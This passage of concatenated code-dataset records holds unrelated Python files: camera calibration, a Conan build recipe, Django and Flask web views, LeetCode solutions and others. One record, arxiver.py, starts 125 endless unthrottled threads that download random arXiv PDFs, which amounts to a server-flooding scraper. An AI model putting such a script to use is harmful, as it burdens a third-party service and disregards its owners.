coeffxpos = self.peakPos['COEFF'][0]\n \n #- Work around pyfits bug which doesn't properly support 2D arrays in tables\n ncoeffxpos = coeffxpos.size / nfib\n coeffxpos = coeffxpos.reshape( (nfib, ncoeffxpos) )\n \n nx = xmax-xmin+1\n xbase = n.arange(xmin,xmax-xmin+1,1)\n x_1 = xmin\n x_2 = xmax\n a = 2/(xmax-xmin)\n b = -1-a*xmin\n x_p_base = a*xbase + b\n dimxpos = n.shape(coeffxpos)[1]\n dimxpos = dimxpos/nfib\n lxpos = n.zeros((ndatapt,))\n dimxpos = n.shape(coeffxpos)[1]\n # Constructing Legendre Polynomial\n for i_leg in range (0, dimxpos):\n lxpostemp = special.legendre(i_leg)\n lxpostemp = lxpostemp(x_p_base)\n lxpos = n.vstack((lxpos ,lxpostemp))\n\n rxpos = coeffxpos.reshape(nfib, dimxpos)\n xpos = n.dot(rxpos,lxpos[1:])\n xpos_final = n.transpose(xpos)\n\n\n #fiber to fiber variatons from fiberflats\n fiberflat = self.spFlat_image\n return(fiberflat, xpos_final, flatSigma)\n","sub_path":"python/bbspec/spec2d/arcmodel2D.py","file_name":"arcmodel2D.py","file_ext":"py","file_size_in_byte":29925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"378453730","text":"import time\nimport cv2\nimport cv2.aruco as aruco\nimport numpy as np\nimport pickle\n\narucoType = aruco.DICT_5X5_250\ndictionary = cv2.aruco.getPredefinedDictionary(arucoType)\narucoBoard = aruco.CharucoBoard_create(9,6,0.7,0.5,aruco.Dictionary_get(arucoType))\n\ncap = cv2.VideoCapture(1)\n#cap.set(cv2.CAP_PROP_FRAME_WIDTH,2560)\n#cap.set(cv2.CAP_PROP_FRAME_HEIGHT,720)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 1344)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 376)\n\nwidth = cap.get(3)\nheigth = cap.get(4)\n\nyMin=0\nyMax=heigth\nxMin=0\nxMax = width/2\n\n\nallCorners = []\nallIds = []\ndecimator = 0\nfor i in range(50):\n\n ret,frame = cap.read()\n frame = frame[yMin:yMax,xMin:xMax] # this is all there is to cropping\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n res = cv2.aruco.detectMarkers(gray,dictionary)\n\n if len(res[0])>0:\n res2 = cv2.aruco.interpolateCornersCharuco(res[0],res[1],gray,arucoBoard)\n if res2[1] is not None and res2[2] is not None and len(res2[1])>3 and decimator%3==0:\n allCorners.append(res2[1])\n allIds.append(res2[2])\n\n cv2.aruco.drawDetectedMarkers(gray,res[0],res[1])\n #print i\n cv2.imshow('frame',gray)\n if cv2.waitKey(1000/5) & 0xFF == ord('q'):\n break\n decimator+=1\n\nimsize = gray.shape\n\n#Calibration fails for lots of reasons. Release the video if we do\nprint(\"Trying calibration\")\nretval, cameraMatrix, distCoeffs, rvecs, tvecs = cv2.aruco.calibrateCameraCharuco(allCorners,allIds,arucoBoard,imsize,None,None)\nprint(retval)\n# Writing the calibration data so it must not be repeated each time\n\ncamera_values = {'retval':retval, 'cameraMatrix':cameraMatrix,'distCoeffs':distCoeffs,'rvecs':rvecs,'tvecs':tvecs}\nfile_out = open( \"ZED_new_2.cal\", \"wb\" );\npickle.dump( camera_values, file_out)\nfile_out.close()\n\nprint(camera_values)\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"data_analysis/aruco_tools/CameraCalibrator.py","file_name":"CameraCalibrator.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"14825430","text":"#!/usr/bin/env python\n# \n# Copyright 2012 Google Inc. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# #\n\n\"\"\"Simian Settings Models.\"\"\"\n\n\n\n\nimport logging\n\nfrom google.appengine.ext import db\n\nfrom simian.mac.models import base\n\nSETTINGS = {\n 'api_info_key': {\n 'type': 'random_str',\n 'title': 'API Info Key',\n },\n 'apple_auto_promote_enabled': {\n 'type': 'bool',\n 'title': 'Apple Update Auto-Promotion Enabled',\n 'comment': 'If enabled, items auto-promote through release tracks.',\n 'default': True,\n },\n 'apple_auto_promote_stable_weekday': {\n 'type': 'integer',\n 'title': 'Apple Update Stable Auto-Promote Weekday',\n 'comment': 'Integer weekday, where Monday is 0 and Sunday is 6.',\n 'default': 2,\n },\n 'apple_auto_unattended_enabled': {\n 'type': 'bool',\n 'title': 'Apple Update Auto-Unattended Enabled',\n 'comment': ('If enabled, new updates not requiring a restart are set '\n 'as unattended automatically.'),\n 'default': True,\n },\n 'apple_unstable_grace_period_days': {\n 'type': 'integer',\n 'title': 'Apple Update Auto-Promote Unstable Grace Period Days',\n 'comment': ('Number of days before updates auto-promote from '\n 'unstable to testing.'),\n 'default': 4,\n },\n 'apple_testing_grace_period_days': {\n 'type': 'integer',\n 'title': 'Apple Update Auto-Promote Testing Grace Period Days',\n 'comment': ('Number of days before updates auto-promote from '\n 'testing to stable.'),\n 'default': 7,\n },\n 'email_admin_list': {\n 'type': 'string',\n 'title': 'Admin List Email',\n 'comment': 'Server notifications are emailed to this address',\n },\n 'email_domain': {\n 'type': 'string',\n 'title': 'Email Domain',\n },\n 'email_sender': {\n 'type': 'string',\n 'title': 'Email Sender',\n 'comment': 'e.g. Simian Team <admin@example.com>',\n },\n 'email_reply_to': {\n 'type': 'string',\n 'title': 'Email reply-to',\n 'comment': 'e.g. Simian Team <admin@example.com>',\n },\n 'email_on_every_change': {\n 'type': 'bool',\n 'title': 'Notify Admins of all changes.',\n 'comment': 'Check to send a mail to all admins on every change.',\n 'default': False,\n },\n 'uuid_lookup_url': {\n 'type': 'string',\n 'title': 'UUID lookup tool URL',\n 'comment': 'uuid will be appended to URL like http://corp/<uuid>',\n },\n 'owner_lookup_url': {\n 'type': 'string',\n 'title': 'Owner lookup tool URL',\n 'comment': ('owner username will be appended to URL like '\n 'http://corp/<owner-username>'),\n },\n 'required_issuer': {\n 'type': 'string',\n 'title': 'Required Issuer',\n 'suffix': True,\n },\n 'xsrf_secret': {\n 'type': 'random_str',\n 'title': 'XSRF secret',\n },\n 'server_private_key_pem': {\n 'type': 'pem',\n 'suffix': True,\n },\n 'server_public_cert_pem': {\n 'type': 'pem',\n 'suffix': True,\n },\n 'ca_public_cert_pem': {\n 'type': 'pem',\n 'suffix': True,\n }\n}\n\n\nclass Settings(base.KeyValueCache):\n \"\"\"Model for settings.\"\"\"\n\n @classmethod\n def GetType(cls, name):\n \"\"\"Get the type for a setting.\n\n Args:\n name: str, like 'ca_public_cert_pem' or 'suffix_ca_public_cert_pem'\n if suffix==True in the SETTINGS[name] dict above.\n Returns:\n type like 'pem', 'string', 'random_str', None\n \"\"\"\n if name in SETTINGS:\n return SETTINGS.get(name, {}).get('type')\n # Look for name as a prefix to a setting with suffix==True.\n for k in SETTINGS:\n if ('suffix' in SETTINGS[k] and SETTINGS[k]['suffix'] and\n name.endswith('_%s' % k)):\n return SETTINGS.get(k, {}).get('type')\n return None\n\n @classmethod\n def GetItem(cls, name):\n \"\"\"Get an item from settings.\n\n If the item is in a serialized container it will be deserialized\n before returning it.\n\n Args:\n name: str, like 'ca_public_cert_pem' or 'required_issuer'\n Returns:\n (value for that setting, datetime time of last change)\n \"\"\"\n if Settings.GetType(name) in ['pem', 'string', 'random_str']:\n value, mtime = super(Settings, cls).GetItem(name)\n else:\n value, mtime = cls.GetSerializedItem(name)\n\n if mtime is None: # item was not in Datastore, use default if it exists.\n value = SETTINGS.get(name, {}).get('default')\n return value, mtime\n\n @classmethod\n def SetItem(cls, name, value):\n \"\"\"Set an item into settings.\n\n If the item belongs in a serialized container it will be serialized\n before storage.\n\n Args:\n name: str, like 'ca_public_cert_pem'\n value: str, value\n \"\"\"\n if Settings.GetType(name) in ['pem', 'string', 'random_str']:\n return super(Settings, cls).SetItem(name, value)\n else:\n return cls.SetSerializedItem(name, value)\n\n @classmethod\n def GetAll(cls):\n \"\"\"Return a dictionary of all settings.\n\n Format = {\n 'setting name': {\n 'value': value,\n 'mtime': datetime,\n },\n }\n \"\"\"\n settings = SETTINGS.copy()\n for setting in SETTINGS:\n value, mtime = cls.GetItem(setting)\n settings[setting]['value'] = value\n settings[setting]['mtime'] = mtime\n return settings","sub_path":"src/simian/mac/models/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"208017914","text":"from conans import ConanFile, tools, RunEnvironment\nfrom conans.errors import ConanInvalidConfiguration\nimport os\nimport json\nimport re\n\nclass CrashpadConan(ConanFile):\n name = \"crashpad\"\n version = \"20200624\"\n description = \"Crashpad is a crash-reporting system.\"\n license = \"Apache-2.0\"\n homepage = \"https://github.com/chromium/crashpad.git\"\n url = \"https://github.com/bincrafters/conan-crashpad\"\n topics = (\"conan\", \"crash-reporting\", \"logging\", \"minidump\", \"crash\")\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {'linktime_optimization': [True, False], 'fPIC': [True, False]}\n default_options = {\"linktime_optimization\": False, 'fPIC': True}\n exports = [ \"patches/*\", \"LICENSE.md\" ]\n short_paths = True\n\n _commit_id = \"41456998748bd3c058f36f5d785810bf7ea7a954\"\n _source_dir = \"crashpad\"\n _build_name = \"out/Conan\"\n _build_dir = os.path.join(_source_dir, _build_name)\n\n def _depot_tools(self):\n return os.path.join(self.source_folder, \"depot_tools\")\n\n def _crashpad_source_base(self):\n return os.path.join(self.source_folder, \"crashpad_source\")\n\n def _crashpad_source(self):\n return os.path.join(self._crashpad_source_base(), \"crashpad\")\n\n def build_requirements(self):\n self.build_requires(\"depot_tools/20200407\")\n self.build_requires(\"ninja/1.10.2\")\n\n def requirements(self):\n if self.settings.os == \"Linux\":\n self.requires(\"openssl/1.1.1k\")\n self.requires(\"zlib/1.2.11\")\n\n def _mangle_spec_for_gclient(self, solutions):\n return json.dumps(solutions) \\\n .replace(\"\\\"\", \"\\\\\\\"\") \\\n .replace(\"false\", \"False\") \\\n .replace(\"true\", \"True\")\n\n def _make_spec(self):\n solutions = [{\n \"url\": \"%s@%s\" % (self.homepage, self._commit_id),\n \"managed\": False,\n \"name\": \"%s\" % (self.name),\n }]\n return \"solutions=%s\" % self._mangle_spec_for_gclient(solutions)\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n # It's not a C project, but libcxx is hardcoded in the project\n del self.settings.compiler.libcxx\n del self.settings.compiler.cppstd\n\n if self.settings.os != \"Windows\" and not self.options.fPIC:\n raise ConanInvalidConfiguration(\"We only support compiling with fPIC enabled!\")\n\n def source(self):\n env = RunEnvironment(self).vars\n # We have to enable auto-updating - depot_tools won't work otherwise\n env[\"DEPOT_TOOLS_UPDATE\"] = \"1\"\n\n with tools.environment_append(env):\n self.run(\"gclient config --spec=\\\"%s\\\"\" % self._make_spec())\n self.run(\"gclient sync --no-history\")\n\n if self.settings.os == \"Windows\":\n tools.patch(base_path=os.path.join(self._source_dir, \"third_party/mini_chromium/mini_chromium\"),\n patch_file=\"patches/windows_adaptions.patch\")\n\n def _get_target_cpu(self):\n arch = str(self.settings.arch)\n\n if arch == \"x86\":\n return \"x86\"\n elif arch == \"x86_64\":\n return \"x64\"\n\n # best effort... please contribute, if you actually tested those platforms\n elif arch.startswith(\"arm\"):\n match = re.match('^armv([0-9]+)', arch)\n if int(match.group(1)) >= 8 and not \"32\" in arch:\n return \"arm64\"\n else:\n return \"arm\"\n elif arch.startswith(\"mips\"):\n return \"mipsel\"\n\n raise ConanInvalidConfiguration(\"your architecture (%s) is not supported\" % arch)\n\n def _setup_args_gn(self):\n os_map = { 'Windows': 'win', 'Linux': 'linux' } # Maps conan os identifiers to GN os identifiers\n target_os = os_map[str(self.settings.os)]\n args = [\"is_debug=%s\" % (\"true\" if self.settings.build_type == \"Debug\" else \"false\"),\n \"target_cpu=\\\\\\\"%s\\\\\\\"\" % self._get_target_cpu(),\n \"target_os=\\\\\\\"{}\\\\\\\"\".format(target_os),\n \"target_sysroot=\\\\\\\"{}\\\\\\\"\".format(os.environ.get('sysroot', '')) ]\n\n if self.settings.os == \"Macos\" and self.settings.get_safe(\"os.version\"):\n args += [ \"mac_deployment_target=\\\\\\\"%s\\\\\\\"\" % self.settings.os.version ]\n if self.settings.os == \"Windows\":\n args += [ \"linktime_optimization=%s\" % str(self.options.linktime_optimization).lower()]\n if self.settings.os == \"Windows\" and self.settings.get_safe(\"compiler.runtime\"):\n crt = str(self.settings.compiler.runtime)\n args += [ \"dynamic_crt=%s\" % (\"true\" if crt.startswith(\"MD\") else \"false\") ]\n if self.settings.os == \"Linux\":\n args += [ \"crashpad_use_boringssl_for_http_transport_socket=true\"]\n return \" \".join(args)\n\n def build(self):\n tools.patch(patch_file=\"patches/openssl_lib_order.patch\")\n\n BUILD_gn = 'crashpad/third_party/mini_chromium/mini_chromium/build/BUILD.gn'\n tools.replace_in_file(BUILD_gn, 'cc = \"clang\"', 'cc = \"{}\"'.format(os.environ.get('CC', 'cc')))\n tools.replace_in_file(BUILD_gn, 'cxx = \"clang++\"', 'cxx = \"{}\"'.format(os.environ.get('CXX', 'c++')))\n\n if self.settings.os != \"Windows\" and self.settings.compiler == \"gcc\":\n tools.replace_in_file(BUILD_gn, '\"-Werror\",', '\"-Wno-multichar\",')\n tools.replace_in_file(BUILD_gn, '\"-Wheader-hygiene\",', '')\n tools.replace_in_file(BUILD_gn, '\"-Wnewline-eof\",', '')\n tools.replace_in_file(BUILD_gn, '\"-Wstring-conversion\",', '')\n tools.replace_in_file(BUILD_gn, '\"-Wexit-time-destructors\"', '')\n tools.replace_in_file(BUILD_gn, '\"-fobjc-call-cxx-cdtors\",', '')\n\n def quote(x):\n return '\"{}\"'.format(x)\n\n ldflags = list(map(quote, os.environ.get('LDFLAGS', '').split(' ')))\n\n cflags = list(map(quote, os.environ.get('CFLAGS', '').split(' ')))\n cflags.append('\"-std=c11\"')\n\n cxxflags = list(map(quote, os.environ.get('CXXFLAGS', '').split(' ')))\n cxxflags.append('\"-std=c++14\"')\n\n if \"openssl\" in self.deps_cpp_info.deps:\n openssl_info = self.deps_cpp_info[\"openssl\"]\n ldflags.append('\"-L{}\"'.format(openssl_info.lib_paths[0]))\n cxxflags.append('\"-I{}\"'.format(openssl_info.include_paths[0]))\n\n if \"zlib\" in self.deps_cpp_info.deps:\n zlib_info = self.deps_cpp_info[\"zlib\"]\n ldflags.append('\"-L{}\"'.format(zlib_info.lib_paths[0]))\n cxxflags.append('\"-I{}\"'.format(zlib_info.include_paths[0]))\n\n tools.replace_in_file(BUILD_gn, 'ldflags = []', 'ldflags = [ {} ]'.format(\", \".join(ldflags)))\n tools.replace_in_file(BUILD_gn, 'cflags_c = [ \"-std=c11\" ]', 'cflags_c = [ {} ]'.format(\", \".join(cflags)))\n tools.replace_in_file(BUILD_gn, 'cflags_cc = [ \"-std=c++14\" ]', 'cflags_cc = [ {} ]'.format(\", \".join(cxxflags)))\n\n with tools.chdir(self._source_dir):\n self.run('gn gen %s --args=\"%s\"' % (self._build_name, self._setup_args_gn()), run_environment=True)\n self.run(\"ninja -j%d -C %s\" % (tools.cpu_count(), self._build_name), run_environment=True)\n\n def _copy_lib(self, src_dir):\n self.copy(\"*.a\", dst=\"lib\",\n src=os.path.join(self._build_dir, src_dir), keep_path=False)\n self.copy(\"*.lib\", dst=\"lib\",\n src=os.path.join(self._build_dir, src_dir), keep_path=False)\n\n def _copy_headers(self, dst_dir, src_dir):\n self.copy(\"*.h\", dst=os.path.join(\"include\", dst_dir),\n src=os.path.join(self._source_dir, src_dir))\n\n def _copy_bin(self, src_bin):\n self.copy(src_bin, src=self._build_dir, dst=\"bin\")\n self.copy(\"%s.exe\" % src_bin, src=self._build_dir, dst=\"bin\")\n\n def package(self):\n self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_dir,\n ignore_case=True, keep_path=False)\n\n self._copy_headers(\"crashpad/client\", \"client\")\n self._copy_headers(\"crashpad/util\", \"util\")\n self._copy_headers(\"mini_chromium\", \"third_party/mini_chromium/mini_chromium\")\n self._copy_lib(\"obj/client\")\n self._copy_lib(\"obj/util\")\n self._copy_lib(\"obj/third_party/mini_chromium\")\n self._copy_bin(\"crashpad_handler\")\n\n def package_info(self):\n self.cpp_info.includedirs = [ \"include/crashpad\", \"include/mini_chromium\" ]\n self.cpp_info.libdirs = [ \"lib\" ]\n self.cpp_info.libs = [ \"client\", \"util\", \"base\" ]\n\n if self.settings.os == \"Macos\":\n self.cpp_info.exelinkflags.append(\"-framework CoreFoundation\")\n self.cpp_info.exelinkflags.append(\"-framework CoreGraphics\")\n self.cpp_info.exelinkflags.append(\"-framework CoreText\")\n self.cpp_info.exelinkflags.append(\"-framework Foundation\")\n self.cpp_info.exelinkflags.append(\"-framework IOKit\")\n self.cpp_info.exelinkflags.append(\"-framework Security\")\n self.cpp_info.exelinkflags.append(\"-lbsm\")\n self.cpp_info.sharedlinkflags = self.cpp_info.exelinkflags\n","sub_path":"third_party/conan/recipes/crashpad/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":9188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"13859157","text":"import sys #한글 인코딩 모듈\nimport io # 한글 인코딩 모듈2\nimport urllib.request as dw\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')# 한글 인코딩\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')# 한글 인코딩2\n\nimgUrl = \"http://blogfiles14.naver.net/MjAxNzAzMTJfMTg4/MDAxNDg5MjQ2NjIzNzQ2.-Jp0_ltrm8BKtDFvu6vnhG94BjmNf87wAD64Z2CjLZkg.dEZbWkcDL-nm3pY3oVA-gsYVFyt_PD51HpRQ2WqBTuUg.JPEG.i0046279/cute-melted-animals-14-58beb6272f9a2__605_by_ImageRaker.jpg\"\n#이미지 링크 주소 복사해서 URL 변수로 만듬\nhtmlURL = \"http://naver.com\"\n\nsavePath1 = \"C:/Users/For Programming/test1.jpg\"\nsavePath2 = \"C:/Users/For Programming/index.html\"\n\nf = dw.urlopen(imgUrl).read()\nf2 = dw.urlopen(htmlURL).read()\n\nsaveFile1 = open(savePath1,'wb') # w: write, r: read, a: add\nsaveFile1.write(f)\nsaveFile1.close()\n\nwith open(savePath2,'wb') as saveFile2:\n saveFile2.write(f2)\n\n#urlretrieve: 저장 -> open(\"r\") -> 변수에 할당 -> 저장 /파싱이 필요없는 데이터는 사용 용이함.\n#urlopen: 변수 할당 -> 파싱 -> 저장(db) #중간 작업에서 가공하고 여러 과정이 필요할 경우 용이함.\nprint(\"다운로드 완료!\")\n","sub_path":"0812study(1).py","file_name":"0812study(1).py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95245032","text":"# Time: O(n)\n# Space: O(1)\n#\n# Given an array nums containing n + 1 integers where each integer\n# is between 1 and n (inclusive), prove that at least one duplicate\n# element must exist. Assume that there is only one duplicate number,\n# find the duplicate one.\n#\n# Note:\n# - You must not modify the array (assume the array is read only).\n# - You must use only constant extra space.\n# - Your runtime complexity should be less than O(n^2).\n#\n\n# Two pointers method, same as Linked List Cycle II.\n# 我们对nums数组建图,每个位置 i连一条 i→nums[i] 的边。由于存在的重复的数字 target,因此 target 这个位置\n# 一定有起码两条指向它的边,因此整张图一定存在环,要找的target 就是这个环的入口,那么问题就等价于 142环形链表 II。\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # slow = fast = 0 # WRONG: cannot initialize slow/fast to 0 -> they don't enter the 1st while loop.\n slow, fast = nums[0], nums[nums[0]]\n while slow != fast:\n slow = nums[slow]\n fast = nums[nums[fast]]\n\n fast = 0\n while slow != fast:\n slow = nums[slow]\n fast = nums[fast]\n return slow\n\n\n# Time: O(nlogn)\n# Space: O(1)\n# Binary search method: 定义cnt[i]表示nums数组中小于等于 i的数有多少个,假设重复数target,\n# 那么 [1,target−1]里的所有数满足cnt[i]<=i,[target,n] 里的所有数满足cnt[i]>i,具有单调性。\n# 答案就是在[1,n]中寻找最小的 i 满足cnt[i]>i。\n\nclass Solution2(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n left, right = 1, len(nums) - 1\n\n while left < right:\n mid = left + (right - left) / 2\n # Get count of num <= mid.\n count = sum(x <= mid for x in nums)\n if count > mid: # mid is ok\n right = mid\n else:\n left = mid + 1\n return left\n\n# Time: O(n)\n# Space: O(n)\nclass Solution3(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n duplicate = 0\n # Mark the value as visited by negative.\n for num in nums:\n if nums[abs(num) - 1] > 0:\n nums[abs(num) - 1] *= -1\n else:\n duplicate = abs(num)\n break\n # Rollback the value.\n for num in nums:\n if nums[abs(num) - 1] < 0:\n nums[abs(num) - 1] *= -1\n else:\n break\n return duplicate\n\nprint(Solution().findDuplicate([1,3,4,2,2])) # 2","sub_path":"Python/find-the-duplicate-number.py","file_name":"find-the-duplicate-number.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"245210679","text":"import shutil\nimport requests\nfrom random import randint\nimport time\nimport threading\n\ndef save():\n while 1:\n r0 = randint(10, 18)\n r1 = randint(1, 12)\n r2 = randint(1000, 9999)\n\n if(len(str(r1)) == 1):\n r1 = \"0\" + str(r1)\n\n url = \"https://arxiv.org/pdf/\" + str(r0) + str(r1) + \".0\" + str(r2) + \".pdf\"\n response = requests.get(url, stream=True)\n with open(str(r0) + str(r1) + '.0' + str(r2) + '.pdf', 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n\n\nfor i in range(125): threading.Thread(target=save).start()\n","sub_path":"arxiver.py","file_name":"arxiver.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"77435271","text":"from django.http import JsonResponse\n\n\nfrom Blog.forms import Form_AddP, Form_AddC\nfrom Blog.models import BlogPosts, Blog, PostComments\nfrom members.models import UserInfo\n\n\n\ndef postg(request, bid):\n if request.method == 'GET':\n id = get_user(request)\n if id is None:\n return JsonResponse({'status': -1, 'message': 'invalid'})\n pid = request.GET.get('id')\n p = BlogPosts.objects.filter(post_id=pid).first()\n post = {'datetime': p.time, 'id': p.post_id, 'title': p.title, 'summary': p.summary, 'text': p.text}\n res = {'status': 1, 'post': post}\n #print(res)\n return JsonResponse(res)\n if request.method == 'POST':\n form = Form_AddP(request.POST)\n if form.is_valid():\n s = form.cleaned_data['summary']\n t = form.cleaned_data['text']\n t2 = form.cleaned_data['title']\n blog = Blog.objects.filter(blog_id=bid).first()\n if blog is not None:\n post = BlogPosts.create(blog, t2, s, t)\n post.save()\n return JsonResponse({'status': 1, 'message': 'Successfully Added'})\n\n\ndef commentsg(request):\n res = {}\n user = get_user(request)\n if user is None:\n return JsonResponse({'status': -1, 'message': 'invalid token'})\n post_id = request.GET.get('post_id')\n c = int(request.GET.get('count'))\n o = int(request.GET.get('offset'))\n post = BlogPosts.objects.filter(post_id=post_id).first()\n comments = list(PostComments.objects.filter(post=post).order_by('time'))[o:o + c]\n res['status'] = 1\n res['comments'] = []\n for c in comments:\n temp = {'datetime': c.time, 'text': c.text}\n res['comments'].append(temp)\n return JsonResponse(res)\n\n\ndef postsg(request, blog_id):\n res = {}\n user = get_user(request)\n if user is None:\n print('invalid')\n return JsonResponse({'status': -1, 'message': 'invalid'})\n print('In get posts', user)\n c = int(request.GET.get('count'))\n o = int(request.GET.get('offset'))\n p = list(BlogPosts.objects.filter(blog__blog_id=blog_id).order_by('time'))[o:o + c]\n res['status'] = 1\n #print(res)\n res['posts'] = []\n for p in p:\n temp = {'datetime': p.time, 'id': p.post_id, 'title': p.title, 'summary': p.summary}\n res['posts'].append(temp)\n return JsonResponse(res)\n\n\ndef comment_c(request):\n if request.method == 'POST':\n u = get_user(request)\n if u is None:\n return JsonResponse({'status': -1, 'message': 'invalid'})\n f = Form_AddC(request.POST)\n if f.is_valid():\n print('form is valid')\n text = f.cleaned_data['text']\n post_id = f.cleaned_data[\"id_p\"]\n post = BlogPosts.objects.filter(post_id=post_id).first()\n if post is not None:\n comment = PostComments.create(post, text)\n comment.save()\n print(comment)\n ans = {'status': 1}\n tmp = {'text': text, 'datetime': comment.time}\n ans['comment'] = tmp\n print(ans)\n\n return JsonResponse({'status': 1, 'comment': ans})\n else:\n print('form is not valid')\n return JsonResponse({'status': -1, 'message': 'Under Construction'})\n\n\n\n\ndef get_user(request):\n t = request.META.__getitem__('HTTP_X_TOKEN')\n id = UserInfo.objects.filter(token=t).first()\n if id is not None:\n return id.user\n return None\n\n# post_id text POST\ndef comment_c(request):\n if request.method == 'POST':\n user = get_user(request)\n if user is None:\n return JsonResponse({'status': -1, 'message': 'invalid token'})\n form = Form_AddC(request.POST)\n if form.is_valid():\n print('form is valid')\n text = form.cleaned_data['text']\n post_id = form.cleaned_data[\"id_p\"]\n post = BlogPosts.objects.filter(post_id=post_id).first()\n if post is not None:\n comment = PostComments.create(post, text)\n comment.save()\n print(comment)\n ans = {'status': 1}\n temp = {'text': text, 'datetime': comment.time}\n ans['comment'] = temp\n print(ans)\n\n return JsonResponse({'status': 1, 'comment': ans})\n else:\n print('form is not valid')\n return JsonResponse({'status': -1, 'message': 'Under Construction'})\n\n\n","sub_path":"phase-3-amirhoseinsa-master/BlogMaker/Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"595383824","text":"from flask import Blueprint, render_template, redirect, url_for, flash\nfrom flask_breadcrumbs import register_breadcrumb\nfrom ..forms.user_form import UserForm, UserEdit\nfrom ..utilities.functions import sendRequest\nfrom .auth import admin_required\n\nfrom flask_login import login_required\n\nimport json\n\nuser = Blueprint(\"user\", __name__, url_prefix=\"/user\")\n\n\n@user.route(\"/\")\n@login_required\n@admin_required\n@register_breadcrumb(user, '.', 'Users')\ndef index():\n req = sendRequest(method=\"get\", url=\"/users\", auth=False)\n users = json.loads(req.text)['Users']\n title = \"Users List\"\n return render_template(\"users.html\", title=title, users=users) # Mostrar template\n\n\n@user.route(\"/add-user\", methods=[\"GET\", \"POST\"])\n@login_required\n@admin_required\n@register_breadcrumb(user, \".add\", \"Add User\")\ndef create():\n form = UserForm() # Instanciar formulario\n if form.validate_on_submit(): # Si el formulario ha sido enviado y es valido correctamente\n user = {\n \"email\": form.email.data,\n \"password\": form.password.data,\n \"admin\": form.admin.data\n }\n data = json.dumps(user)\n req = sendRequest(method=\"post\", url=\"/users\", data=data, auth=True)\n return redirect(url_for(\"user.index\")) # Redirecciona a la lista de usuarios\n return render_template(\"user_form.html\", form=form)\n\n\n@user.route(\"/edit/<int:id>\", methods=[\"GET\",\"POST\"])\n@login_required\n@admin_required\n@register_breadcrumb(user, \".edit\", \"Edit User\")\ndef edit(id):\n form = UserEdit()\n if not form.is_submitted():\n req = sendRequest(method=\"get\", url=\"/user/\" + str(id), auth=True)\n if req.status_code == 404:\n flash(\"User not found\", \"danger\")\n return redirect(url_for(\"user.index\"))\n user = json.loads(req.text)\n form.email.data = user[\"email\"]\n form.admin.data = user[\"admin\"]\n\n if form.validate_on_submit():\n user = {\n \"email\": form.email.data,\n \"admin\": form.admin.data\n }\n data = json.dumps(user)\n req = sendRequest(method=\"put\", url=\"/user/\" + str(id), data=data, auth=True)\n flash(\"User has been edited\", \"success\")\n return redirect(url_for(\"user.index\"))\n return render_template(\"user-edit.html\", form=form, id=id)\n\n\n@user.route('delete/<int:id>')\n@login_required\n@admin_required\ndef delete(id):\n req = sendRequest(method=\"delete\", url=\"/user/\" + str(id), auth=True)\n flash(\"User has been deleted\", \"danger\")\n return redirect(url_for('user.index'))\n\n\n","sub_path":"web/main/routes/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"185160516","text":"# -*- coding: utf-8 -*-\n\nimport socket\nimport sys\nimport json\nfrom threading import current_thread\nfrom Request import Request\n\n\nclass DeliverRequest(Request):\n\tdef __init__(self):\n\t\tRequest.__init__(self)\n\n\tdef getName(self):\n\t\treturn 'deliver'\n\n\tdef handle(self, socket, request):\n\t\tprint('['+str(current_thread().name)+'] - Received ' + self.getName() + ' request')\n\n\t\torder = {}\n\t\torder['orderid'] = request['orderid']\n\t\torder['status'] = 'ready'\n\n\t\tnew = {}\n\t\tnew['status'] = 'topay'\n\n\t\tstatus = self.database.update(order, new)\n\n\t\tif status == False:\n\t\t\tselect = {}\n\t\t\tselect['orderid'] = request['orderid']\n\t\t\tcheck = self.database.select(select)\n\t\t\tif check == False:\n\t\t\t\tselect['error'] = 'no order found'\n\t\t\telif check.status == 'ordered':\n\t\t\t\tselect['error'] = 'order not ready'\n\t\t\tresponse = 